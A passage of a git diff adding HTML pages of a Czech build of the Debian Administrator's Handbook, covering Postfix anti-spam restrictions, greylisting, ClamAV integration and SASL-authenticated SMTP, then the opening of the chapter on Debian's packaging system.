+    check_sender_access hash:/etc/postfix/access_sender,
+    reject_unknown_sender_domain, reject_unlisted_sender,
+    reject_non_fqdn_sender
+</pre></div></div><div
+                class="para">
+					The <code
+                  class="filename">/etc/postfix/access_sender</code> table maps some special treatment to some senders. This usually means listing some senders into a white list or a black list.
+				</div><div
+                class="para">
+					The <code
+                  class="literal">reject_unknown_sender_domain</code> rule requires a valid sender domain, since it is needed for a valid address. The <code
+                  class="literal">reject_unlisted_sender</code> rule rejects local senders if the address does not exist; this prevents emails from being sent from an invalid address in the <code
+                  class="literal">falcot.com</code> domain, and messages emanating from <code
+                  class="literal">joe.bloggs@falcot.com</code> are only accepted if such an address really exists.
+				</div><div
+                class="para">
+					Finally, the <code
+                  class="literal">reject_non_fqdn_sender</code> rule rejects emails purporting to come from addresses without a fully-qualified domain name. In practice, this means rejecting emails coming from <code
+                  class="literal">user@machine</code>: the address must be announced as either <code
+                  class="literal">user@machine.example.com</code> or <code
+                  class="literal">user@example.com</code>.
+				</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.4.9.7"></a>11.1.3.4. Accepting or Refusing Based on the Recipient</h4></div></div></div><div
+                class="para">
+					Each email has at least one recipient, announced with the <code
+                  class="literal">RCPT TO</code> command in the SMTP protocol. These addresses also warrant validation, even if that may be less relevant than the checks made on the sender address.
+				</div><a
+                id="id-1.14.4.9.7.3"
+                class="indexterm"></a><a
+                id="id-1.14.4.9.7.4"
+                class="indexterm"></a><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.4.9.7.5"></a><p
+                  class="title"><strong>Příklad 11.9. Recipient checks</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">
+smtpd_recipient_restrictions = permit_mynetworks, 
+    reject_unauth_destination, reject_unlisted_recipient, 
+    reject_non_fqdn_recipient
+</pre></div></div><div
+                class="para">
+					<code
+                  class="literal">reject_unauth_destination</code> is the basic rule that requires outside messages to be addressed to us; messages sent to an address not served by this server are rejected. Without this rule, a server becomes an open relay that allows spammers to send unsolicited emails; this rule is therefore mandatory, and it will be best included near the beginning of the list, so that no other rules may authorize the message before its destination has been checked.
+				</div><div
+                class="para">
+					The <code
+                  class="literal">reject_unlisted_recipient</code> rule rejects messages sent to non-existing local users, which makes sense. Finally, the <code
+                  class="literal">reject_non_fqdn_recipient</code> rule rejects non-fully-qualified addresses; this makes it impossible to send an email to <code
+                  class="literal">jean</code> or <code
+                  class="literal">jean@machine</code>, and requires using the full address instead, such as <code
+                  class="literal">jean@machine.falcot.com</code> or <code
+                  class="literal">jean@falcot.com</code>.
+				</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.4.9.8"></a>11.1.3.5. Restrictions Associated with the <code
+                        class="literal">DATA</code> Command</h4></div></div></div><div
+                class="para">
+					The <code
+                  class="literal">DATA</code> command of SMTP is emitted before the contents of the message. It doesn't provide any information per se, apart from announcing what comes next. It can still be subjected to checks.
+				</div><a
+                id="id-1.14.4.9.8.3"
+                class="indexterm"></a><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.4.9.8.4"></a><p
+                  class="title"><strong>Příklad 11.10. <code
+                      class="literal">DATA</code> checks</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">
+smtpd_data_restrictions = reject_unauth_pipelining
+</pre></div></div><div
+                class="para">
+					The <code
+                  class="literal">reject_unauth_pipelining</code> directives causes the message to be rejected if the sending party sends a command before the reply to the previous command has been sent. This guards against a common optimization used by spammer robots, since they usually don't care a fig about replies and only focus on sending as many emails as possible in as short a time as possible.
+				</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.4.9.9"></a>11.1.3.6. Applying Restrictions</h4></div></div></div><div
+                class="para">
+					Although the above commands validate information at various stages of the SMTP exchange, Postfix only sends the actual rejection as a reply to the <code
+                  class="literal">RCPT TO</code> command.
+				</div><div
+                class="para">
+					This means that even if the message is rejected due to an invalid <code
+                  class="literal">EHLO</code> command, Postfix knows the sender and the recipient when announcing the rejection. It can then log a more explicit message than it could if the transaction had been interrupted from the start. In addition, a number of SMTP clients do not expect failures on the early SMTP commands, and these clients will be less disturbed by this late rejection.
+				</div><div
+                class="para">
+					A final advantage to this choice is that the rules can accumulate information during the various stages of the SMTP exchange; this allows defining more fine-grained permissions, such as rejecting a non-local connection if it announces itself with a local sender.
+				</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.4.9.10"></a>11.1.3.7. Filtering Based on the Message Contents</h4></div></div></div><div
+                class="para">
+					The validation and restriction system would not be complete without a way to apply checks to the message contents. Postfix differentiates the checks applying to the email headers from those applying to the email body.
+				</div><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.4.9.10.3"></a><p
+                  class="title"><strong>Příklad 11.11. Enabling content-based filters</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">
+header_checks = regexp:/etc/postfix/header_checks
+body_checks = regexp:/etc/postfix/body_checks
+</pre></div></div><a
+                id="id-1.14.4.9.10.4"
+                class="indexterm"></a><div
+                class="para">
+					Both files contain a list of regular expressions (commonly known as <span
+                  class="emphasis"><em>regexps</em></span> or <span
+                  class="emphasis"><em>regexes</em></span>) and associated actions to be triggered when the email headers (or body) match the expression.
+				</div><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>QUICK LOOK</em></span> Regexp tables</strong></p></div></div></div><div
+                  class="para">
+					The <code
+                    class="filename">/usr/share/doc/postfix-doc/examples/header_checks.gz</code> file contains many explanatory comments and can be used as a starting point for creating the <code
+                    class="filename">/etc/postfix/header_checks</code> and <code
+                    class="filename">/etc/postfix/body_checks</code> files.
+				</div></div><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.4.9.10.7"></a><p
+                  class="title"><strong>Příklad 11.12. Example <code
+                      class="filename">/etc/postfix/header_checks</code> file</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">
+/^X-Mailer: GOTO Sarbacane/ REJECT I fight spam (GOTO Sarbacane)
+/^Subject: *Your email contains VIRUSES/ DISCARD virus notification
+</pre></div></div><div
+                class="sidebar"><a
+                  xmlns=""
+                  id="sidebar.regexp"></a><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>BACK TO BASICS</em></span> Regular expression</strong></p></div></div></div><div
+                  class="para">
+					The <span
+                    class="emphasis"><em>regular expression</em></span> term (shortened to <span
+                    class="emphasis"><em>regexp</em></span> or <span
+                    class="emphasis"><em>regex</em></span>) references a generic notation for expressing a description of the contents and/or structure of a string of characters. Certain special characters allow defining alternatives (for instance, <code
+                    class="literal">foo|bar</code> matches either “foo” or “bar”), sets of allowed characters (for instance, <code
+                    class="literal">[0-9]</code> means any digit, and <code
+                    class="literal">.</code> — a dot — means any character), quantifications (<code
+                    class="literal">s?</code> matches either <code
+                    class="literal">s</code> or the empty string, in other words 0 or 1 occurrence of <code
+                    class="literal">s</code>; <code
+                    class="literal">s+</code> matches one or more consecutive <code
+                    class="literal">s</code> characters; and so on). Parentheses allow grouping search results.
+				</div><div
+                  class="para">
+					The precise syntax of these expressions varies across the tools using them, but the basic features are similar. <div
+                    xmlns=""
+                    class="url">→ <a
+                      xmlns="http://www.w3.org/1999/xhtml"
+                      href="http://en.wikipedia.org/wiki/Regular_expression">http://en.wikipedia.org/wiki/Regular_expression</a></div>
+				</div></div><div
+                class="para">
+					The first one checks the header mentioning the email software; if <code
+                  class="literal">GOTO Sarbacane</code> (a bulk email software) is found, the message is rejected. The second expression controls the message subject; if it mentions a virus notification, we can decide not to reject the message but to discard it immediately instead.
+				</div><div
+                class="para">
+					Using these filters is a double-edged sword, because it is easy to make the rules too generic and to lose legitimate emails as a consequence. In these cases, not only the messages will be lost, but their senders will get unwanted (and annoying) error messages.
+				</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.setting-up-greylisting"></a>11.1.4. Setting Up <span
+                      class="foreignphrase"><em
+                        class="foreignphrase">greylisting</em></span></h3></div></div></div><a
+              id="id-1.14.4.10.2"
+              class="indexterm"></a><div
+              class="para">
+				“Greylisting” is a filtering technique according to which a message is initially rejected with a temporary error code, and only accepted on a further try after some delay. This filtering is particularly efficient against spam sent by the many machines infected by worms and viruses, since this software rarely acts as a full SMTP agent (by checking the error code and retrying failed messages later), especially since many of the harvested addresses are really invalid and retrying would only mean losing time.
+			</div><div
+              class="para">
+				Postfix doesn't provide greylisting natively, but there is a feature by which the decision to accept or reject a given message can be delegated to an external program. The <span
+                class="pkg pkg">postgrey</span> package contains just such a program, designed to interface with this access policy delegation service.
+			</div><div
+              class="para">
+				Once <span
+                class="pkg pkg">postgrey</span> is installed, it runs as a daemon and listens on port 10023. Postfix can then be configured to use it, by adding the <code
+                class="literal">check_policy_service</code> parameter as an extra restriction:
+			</div><pre
+              class="programlisting">
+smtpd_recipient_restrictions = permit_mynetworks,
+    [...]
+    check_policy_service inet:127.0.0.1:10023
+</pre><div
+              class="para">
+				Each time Postfix reaches this rule in the ruleset, it will connect to the <code
+                class="command">postgrey</code> daemon and send it information concerning the relevant message. On its side, Postgrey considers the IP address/sender/recipient triplet and checks in its database whether that same triplet has been seen recently. If so, Postgrey replies that the message should be accepted; if not, the reply indicates that the message should be temporarily rejected, and the triplet gets recorded in the database.
+			</div><div
+              class="para">
+				The main disadvantage of greylisting is that legitimate messages get delayed, which is not always acceptable. It also increases the burden on servers that send many legitimate emails.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>IN PRACTICE</em></span> Shortcomings of greylisting</strong></p></div></div></div><div
+                class="para">
+				Theoretically, greylisting should only delay the first mail from a given sender to a given recipient, and the typical delay is in the order of minutes. Reality, however, can differ slightly. Some large ISPs use clusters of SMTP servers, and when a message is initially rejected, the server that retries the transmission may not be the same as the initial one. When that happens, the second server gets a temporary error message due to greylisting too, and so on; it may take several hours until transmission is attempted by a server that has already been involved, since SMTP servers usually increase the delay between retries at each failure.
+			</div><div
+                class="para">
+				As a consequence, the incoming IP address may vary in time even for a single sender. But it goes further: even the sender address can change. For instance, many mailing-list servers encode extra information in the sender address so as to be able to handle error messages (known as <span
+                  class="emphasis"><em>bounces</em></span>). Each new message sent to a mailing-list may then need to go through greylisting, which means it has to be stored (temporarily) on the sender's server. For very large mailing-lists (with tens of thousands of subscribers), this can soon become a problem.
+			</div><div
+                class="para">
+				To mitigate these drawbacks, Postgrey manages a whitelist of such sites, and messages emanating from them are immediately accepted without going through greylisting. This list can easily be adapted to local needs, since it is stored in the <code
+                  class="filename">/etc/postgrey/whitelist_clients</code> file.
+			</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>GOING FURTHER</em></span> Selective greylisting with <span
+                          class="pkg pkg">milter-greylist</span></strong></p></div></div></div><div
+                class="para">
+				The drawbacks of greylisting can be mitigated by only using greylisting on the subset of clients that are already considered as probable sources of spam (because they are listed in a DNS blacklist). This is not possible with <span
+                  class="pkg pkg">postgrey</span> but <span
+                  class="pkg pkg">milter-greylist</span> can be used in such a way.
+			</div><div
+                class="para">
+				In that scenario, since DNS blacklists never triggers a definitive rejection, it becomes reasonable to use aggressive blacklists, including those listing all dynamic IP addresses from ISP clients (such as <code
+                  class="literal">pbl.spamhaus.org</code> or <code
+                  class="literal">dul.dnsbl.sorbs.net</code>).
+			</div><div
+                class="para">
+				Since milter-greylist uses Sendmail's milter interface, the postfix side of its configuration is limited to “<code
+                  class="literal">smtpd_milters = unix:/var/run/milter-greylist/milter-greylist.sock</code>”. The <span
+                  class="citerefentry"><span
+                    class="refentrytitle">greylist.conf</span>(5)</span> manual page documents <code
+                  class="filename">/etc/milter-greylist/greylist.conf</code> and the numerous ways to configure milter-greylist. You will also have to edit <code
+                  class="filename">/etc/default/milter-greylist</code> to actually enable the service.
+			</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.14.4.11"></a>11.1.5. Customizing Filters Based On the Recipient</h3></div></div></div><div
+              class="para">
+				<a
+                class="xref"
+                href="network-services.html#sect.restrictions-for-receiving-and-sending">11.1.3 – „Restrictions for Receiving and Sending“</a> and <a
+                class="xref"
+                href="network-services.html#sect.setting-up-greylisting">11.1.4 – „Setting Up <span
+                  class="foreignphrase"><em
+                    class="foreignphrase">greylisting</em></span>“</a> reviewed many of the possible restrictions. They all have their use in limiting the amount of received spam, but they also all have their drawbacks. It is therefore more and more common to customize the set of filters depending on the recipient. At Falcot Corp, greylisting is interesting for most users, but it hinders the work of some users who need low latency in their emails (such as the technical support service). Similarly, the commercial service sometimes has problems receiving emails from some Asian providers who may be listed in blacklists; this service asked for a non-filtered address so as to be able to correspond.
+			</div><div
+              class="para">
+				Postfix provides such a customization of filters with a “restriction class” concept. The classes are declared in the <code
+                class="literal">smtpd_restriction_classes</code> parameter, and defined the same way as <code
+                class="literal">smtpd_recipient_restrictions</code>. The <code
+                class="literal">check_recipient_access</code> directive then defines a table mapping a given recipient to the appropriate set of restrictions.
+			</div><div
+              class="example"><a
+                xmlns=""
+                id="id-1.14.4.11.4"></a><p
+                class="title"><strong>Příklad 11.13. Defining restriction classes in <code
+                    class="filename">main.cf</code></strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">smtpd_restriction_classes = greylisting, aggressive, permissive
+
+greylisting = check_policy_service inet:127.0.0.1:10023
+aggressive = reject_rbl_client sbl-xbl.spamhaus.org,
+        check_policy_service inet:127.0.0.1:10023
+permissive = permit
+
+smtpd_recipient_restrictions = permit_mynetworks,
+        reject_unauth_destination,
+        check_recipient_access hash:/etc/postfix/recipient_access
+</pre></div></div><div
+              class="example"><a
+                xmlns=""
+                id="id-1.14.4.11.5"></a><p
+                class="title"><strong>Příklad 11.14. The <code
+                    class="filename">/etc/postfix/recipient_access</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+# Unfiltered addresses
+postmaster@falcot.com  permissive
+support@falcot.com     permissive
+sales-asia@falcot.com  permissive
+
+# Aggressive filtering for some privileged users
+joe@falcot.com         aggressive
+
+# Special rule for the mailing-list manager
+sympa@falcot.com       reject_unverified_sender
+
+# Greylisting by default
+falcot.com             greylisting
+</pre></div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.postfix-antivirus"></a>11.1.6. Integrating an Antivirus</h3></div></div></div><a
+              id="id-1.14.4.12.2"
+              class="indexterm"></a><div
+              class="para">
+				The many viruses circulating as attachments to emails make it important to set up an antivirus at the entry point of the company network, since despite an awareness campaign, some users will still open attachments from obviously shady messages.
+			</div><div
+              class="para">
+				The Falcot administrators selected <code
+                class="command">clamav</code> for their free antivirus. The main package is <span
+                class="pkg pkg">clamav</span>, but they also installed a few extra packages such as <span
+                class="pkg pkg">arj</span>, <span
+                class="pkg pkg">unzoo</span>, <span
+                class="pkg pkg">unrar</span> and <span
+                class="pkg pkg">lha</span>, since they are required for the antivirus to analyze attachments archived in one of these formats.
+			</div><a
+              id="id-1.14.4.12.5"
+              class="indexterm"></a><a
+              id="id-1.14.4.12.6"
+              class="indexterm"></a><div
+              class="para">
+				The task of interfacing between antivirus and the email server goes to <code
+                class="command">clamav-milter</code>. A <span
+                class="emphasis"><em>milter</em></span> (short for <span
+                class="emphasis"><em>mail filter</em></span>) is a filtering program specially designed to interface with email servers. A milter uses a standard application programming interface (API) that provides much better performance than filters external to the email servers. Milters were initially introduced by <span
+                class="emphasis"><em>Sendmail</em></span>, but <span
+                class="emphasis"><em>Postfix</em></span> soon followed suit.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>QUICK LOOK</em></span> A milter for Spamassassin</strong></p></div></div></div><a
+                id="id-1.14.4.12.8.2"
+                class="indexterm"></a><div
+                class="para">
+				The <span
+                  class="pkg pkg">spamass-milter</span> package provides a milter based on <span
+                  class="emphasis"><em>SpamAssassin</em></span>, the famous unsolicited email detector. It can be used to flag messages as probable spams (by adding an extra header) and/or to reject the messages altogether if their “spamminess” score goes beyond a given threshold.
+			</div></div><div
+              class="para">
+				Once the <span
+                class="pkg pkg">clamav-milter</span> package is installed, the milter should be reconfigured to run on a TCP port rather than on the default named socket. This can be achieved with <code
+                class="command">dpkg-reconfigure clamav-milter</code>. When prompted for the “Communication interface with Sendmail”, answer “<code
+                class="literal">inet:10002@127.0.0.1</code>”.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>NOTE</em></span> Real TCP port vs named socket</strong></p></div></div></div><div
+                class="para">
+				The reason why we use a real TCP port rather than the named socket is that the postfix daemons often run chrooted and do not have access to the directory hosting the named socket. You could also decide to keep using a named socket and pick a location within the chroot (<code
+                  class="filename">/var/spool/postfix/</code>).
+			</div></div><div
+              class="para">
+				The standard ClamAV configuration fits most situations, but some important parameters can still be customized with <code
+                class="command">dpkg-reconfigure clamav-base</code>.
+			</div><div
+              class="para">
+				The last step involves telling Postfix to use the recently-configured filter. This is a simple matter of adding the following directive to <code
+                class="filename">/etc/postfix/main.cf</code>:
+			</div><pre
+              class="programlisting">
+# Virus check with clamav-milter
+smtpd_milters = inet:[127.0.0.1]:10002
+</pre><div
+              class="para">
+				If the antivirus causes problems, this line can be commented out, and <code
+                class="command">service postfix reload</code> should be run so that this change is taken into account.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>IN PRACTICE</em></span> Testing the antivirus</strong></p></div></div></div><div
+                class="para">
+				Once the antivirus is set up, its correct behavior should be tested. The simplest way to do that is to send a test email with an attachment containing the <code
+                  class="filename">eicar.com</code> (or <code
+                  class="filename">eicar.com.zip</code>) file, which can be downloaded online: <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://www.eicar.org/86-0-Intended-use.html">http://www.eicar.org/86-0-Intended-use.html</a></div>
+			</div><div
+                class="para">
+				This file is not a true virus, but a test file that all antivirus software on the market diagnose as a virus to allow checking installations.
+			</div></div><div
+              class="para">
+				All messages handled by Postfix now go through the antivirus filter.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.authenticated-smtp"></a>11.1.7. Authenticated SMTP</h3></div></div></div><div
+              class="para">
+				Being able to send emails requires an SMTP server to be reachable; it also requires said SMTP server to send emails through it. For roaming users, this may need regularly changing the configuration of the SMTP client, since Falcot's SMTP server rejects messages coming from IP addresses apparently not belonging to the company. Two solutions exist: either the roaming user installs an SMTP server on their computer, or they still use the company server with some means of authenticating as an employee. The former solution is not recommended since the computer won't be permanently connected, and it won't be able to retry sending messages in case of problems; we will focus on the latter solution.
+			</div><div
+              class="para">
+				SMTP authentication in Postfix relies on SASL (<span
+                class="emphasis"><em>Simple Authentication and Security Layer</em></span>). It requires installing the <span
+                class="pkg pkg">libsasl2-modules</span> and <span
+                class="pkg pkg">sasl2-bin</span> packages, then registering a password in the SASL database for each user that needs authenticating on the SMTP server. This is done with the <code
+                class="command">saslpasswd2</code> command, which takes several parameters. The <code
+                class="literal">-u</code> option defines the authentication domain, which must match the <code
+                class="literal">smtpd_sasl_local_domain</code> parameter in the Postfix configuration. The <code
+                class="literal">-c</code> option allows creating a user, and <code
+                class="literal">-f</code> allows specifying the file to use if the SASL database needs to be stored at a different location than the default (<code
+                class="filename">/etc/sasldb2</code>).
+			</div><pre
+              class="screen scale">
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>saslpasswd2 -u `postconf -h myhostname` -f /var/spool/postfix/etc/sasldb2 -c jean</code></strong>
+<code
+                class="computeroutput">[... type jean's password twice ...]</code></pre><div
+              class="para">
+				Note that the SASL database was created in Postfix's directory. In order to ensure consistency, we also turn <code
+                class="filename">/etc/sasldb2</code> into a symbolic link pointing at the database used by Postfix, with the <code
+                class="command">ln -sf /var/spool/postfix/etc/sasldb2 /etc/sasldb2</code> command.
+			</div><div
+              class="para">
+				Now we need to configure Postfix to use SASL. First the <code
+                class="literal">postfix</code> user needs to be added to the <code
+                class="literal">sasl</code> group, so that it can access the SASL account database. A few new parameters are also needed to enable SASL, and the <code
+                class="literal">smtpd_recipient_restrictions</code> parameter needs to be configured to allow SASL-authenticated clients to send emails freely.
+			</div><div
+              class="example"><a
+                xmlns=""
+                id="id-1.14.4.13.7"></a><p
+                class="title"><strong>Příklad 11.15. Enabling SASL in <code
+                    class="filename">/etc/postfix/main.cf</code></strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+# Enable SASL authentication
+smtpd_sasl_auth_enable = yes
+# Define the SASL authentication domain to use
+smtpd_sasl_local_domain = $myhostname
+[...]
+# Adding permit_sasl_authenticated before reject_unauth_destination
+# allows relaying mail sent by SASL-authenticated users
+smtpd_recipient_restrictions = permit_mynetworks,
+    permit_sasl_authenticated,
+    reject_unauth_destination,
+[...]
+</pre></div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>EXTRA</em></span> Authenticated SMTP client</strong></p></div></div></div><div
+                class="para">
+				Most email clients are able to authenticate to an SMTP server before sending outgoing messages, and using that feature is a simple matter of configuring the appropriate parameters. If the client in use does not provide that feature, the workaround is to use a local Postfix server and configure it to relay email via the remote SMTP server. In this case, the local Postfix itself will be the client that authenticates with SASL. Here are the required parameters:
+			</div><pre
+                class="programlisting">
+smtp_sasl_auth_enable = yes
+smtp_sasl_password_maps = hash:/etc/postfix/sasl_passwd
+relay_host = [mail.falcot.com]
+</pre><div
+                class="para">
+				The <code
+                  class="filename">/etc/postfix/sasl_passwd</code> file needs to contain the username and password to use for authenticating on the <code
+                  class="literal">mail.falcot.com</code> server. Here is an example:
+			</div><pre
+                class="programlisting">
+[mail.falcot.com]   joe:LyinIsji
+</pre><div
+                class="para">
+				As for all Postfix maps, this file must be turned into <code
+                  class="filename">/etc/postfix/sasl_passwd.db</code> with the <code
+                  class="command">postmap</code> command.
+			</div></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.network-diagnosis-tools.html"><strong>Předcházející</strong>10.8. Network Diagnosis Tools</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.http-web-server.html"><strong>Další</strong>11.2. Web Server (HTTP)</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/packaging-system.html b/publish/cs-CZ/Debian/9/html/debian-handbook/packaging-system.html
new file mode 100644
index 000000000..e4aa06fd7
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/packaging-system.html
@@ -0,0 +1,318 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 5. Packaging System: Tools and Fundamental Principles</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Binary package, Source package, dpkg, dependencies, conflict" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.after-first-boot.html"
+        title="4.3. After the First Boot" /><link
+        rel="next"
+        href="sect.package-meta-information.html"
+        title="5.2. Package Meta-Information" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/packaging-system.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.after-first-boot.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.package-meta-information.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="packaging-system"></a>Kapitola 5. Packaging System: Tools and Fundamental Principles</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="packaging-system.html#sect.binary-package-structure">5.1. Structure of a Binary Package</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.package-meta-information.html">5.2. Package Meta-Information</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.package-meta-information.html#sect.control">5.2.1. Description: the <code
+                        class="filename">control</code> File</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.package-meta-information.html#sect.configuration-scripts">5.2.2. Configuration Scripts</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.package-meta-information.html#sect.conffiles">5.2.3. Checksums, List of Configuration Files</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.source-package-structure.html">5.3. Structure of a Source Package</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.source-package-structure.html#id-1.8.7.4">5.3.1. Format</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.source-package-structure.html#id-1.8.7.5">5.3.2. Usage within Debian</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.manipulating-packages-with-dpkg.html">5.4. Manipulating Packages with <code
+                    class="command">dpkg</code></a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.manipulating-packages-with-dpkg.html#id-1.8.8.5">5.4.1. Installing Packages</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.manipulating-packages-with-dpkg.html#id-1.8.8.6">5.4.2. Package Removal</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.manipulating-packages-with-dpkg.html#id-1.8.8.7">5.4.3. Querying <code
+                        class="command">dpkg</code>'s Database and Inspecting <code
+                        class="filename">.deb</code> Files</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.manipulating-packages-with-dpkg.html#id-1.8.8.8">5.4.4. <code
+                        class="command">dpkg</code>'s Log File</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.manipulating-packages-with-dpkg.html#sect.multi-arch">5.4.5. Multi-Arch Support</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.coexistence-with-other-packaging-systems.html">5.5. Coexistence with Other Packaging Systems</a></span></dt></dl></div><div
+          class="highlights"><div
+            class="para">
+		As a Debian system administrator, you will routinely handle <code
+              class="filename">.deb</code> packages, since they contain consistent functional units (applications, documentation, etc.), whose installation and maintenance they facilitate. It is therefore a good idea to know what they are and how to use them.
+	</div></div><div
+          class="para">
+		This chapter describes the structure and contents of “binary” and “source” packages. The former are <code
+            class="filename">.deb</code> files, directly usable by <code
+            class="command">dpkg</code>, while the latter contain the source code, as well as instructions for building binary packages.
+	</div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.binary-package-structure"></a>5.1. Structure of a Binary Package</h2></div></div></div><a
+            id="id-1.8.5.2"
+            class="indexterm"></a><a
+            id="id-1.8.5.3"
+            class="indexterm"></a><div
+            class="para">
+			The Debian package format is designed so that its content may be extracted on any Unix system that has the classic commands <code
+              class="command">ar</code>, <code
+              class="command">tar</code>, and <code
+              class="command">xz</code> (sometimes <code
+              class="command">gzip</code> or <code
+              class="command">bzip2</code>). This seemingly trivial property is important for portability and disaster recovery.
+		</div><div
+            class="para">
+			Imagine, for example, that you mistakenly deleted the <code
+              class="command">dpkg</code> program, and that you could thus no longer install Debian packages. <code
+              class="command">dpkg</code> being a Debian package itself, it would seem your system would be done for... Fortunately, you know the format of a package and can therefore download the <code
+              class="filename">.deb</code> file of the <span
+              class="pkg pkg">dpkg</span> package and install it manually (see sidebar <a
+              class="xref"
+              href="packaging-system.html#sidebar.dpkg-apt-ar"><span
+                class="emphasis"><em>TOOLS</em></span> <code
+                class="command">dpkg</code>, <code
+                class="command">APT</code> and <code
+                class="command">ar</code></a>). If by some misfortune one or more of the programs <code
+              class="command">ar</code>, <code
+              class="command">tar</code> or <code
+              class="command">gzip</code>/<code
+              class="command">xz</code>/<code
